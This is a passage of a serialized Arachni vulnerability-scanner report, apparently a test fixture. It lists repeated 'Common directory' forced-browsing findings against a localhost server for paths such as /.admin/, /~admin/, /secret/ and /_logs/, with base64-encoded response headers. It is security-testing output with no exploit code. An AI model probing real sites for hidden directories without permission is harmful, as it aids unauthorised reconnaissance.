server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/signup/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/signup/ injected: signup id: signup elem: path remarks: {} method: '' response: signup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/scans/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/scans/ injected: scans id: scans elem: path remarks: {} method: '' response: scans headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/_errors/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/_errors/ injected: _errors id: _errors elem: path remarks: {} method: '' response: _errors headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Nw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/recent/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/recent/ injected: recent id: recent elem: path remarks: {} method: '' response: recent headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/cache/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/cache/ injected: cache id: cache elem: path remarks: {} method: '' response: cache headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/_logs/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/_logs/ injected: _logs id: _logs elem: path remarks: {} method: '' response: _logs headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/webaccess/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/webaccess/ injected: webaccess id: webaccess elem: path remarks: {} method: '' response: webaccess headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- OQ== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/pics/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/pics/ injected: pics id: pics elem: path remarks: {} method: '' response: pics headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/_tests/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/_tests/ injected: _tests id: _tests elem: path remarks: {} method: '' response: _tests headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/.adm/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/.adm/ injected: .adm id: .adm elem: path remarks: {} method: '' response: .adm headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/.admin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/.admin/ injected: .admin id: .admin elem: path remarks: {} method: '' response: .admin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/~admin/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: true references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/~admin/ injected: ~admin id: ~admin elem: path remarks: {} method: '' response: ~admin headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/secret/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/secret/ injected: secret id: secret elem: path remarks: {} method: '' response: secret headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Ng== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/db2/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/db2/ injected: db2 id: db2 elem: path remarks: {} method: '' response: db2 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/mrtg/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/mrtg/ injected: mrtg id: mrtg elem: path remarks: {} method: '' response: mrtg headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. 
mod_name: Common directories variations: [] internal_modname: CommonDirectories internal_modname: CommonDirectories - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing url: http://localhost:8099/owa/ elem: path method: '' name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: http://cwe.mitre.org/data/definitions/538.html severity: Medium remedy_guidance: Do not expose file and directory information to the user. mod_name: Common directories variations: - !ruby/object:Arachni::Issue verification: false references: CWE: http://cwe.mitre.org/data/definitions/538.html OWASP: https://www.owasp.org/index.php/Forced_browsing opts: :regexp: '' url: http://localhost:8099/owa/ injected: owa id: owa elem: path remarks: {} method: '' response: owa headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- Mw== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Common directory description: Tries to find common directories on the server. tags: - path - directory - common - discovery cwe: '538' cwe_url: 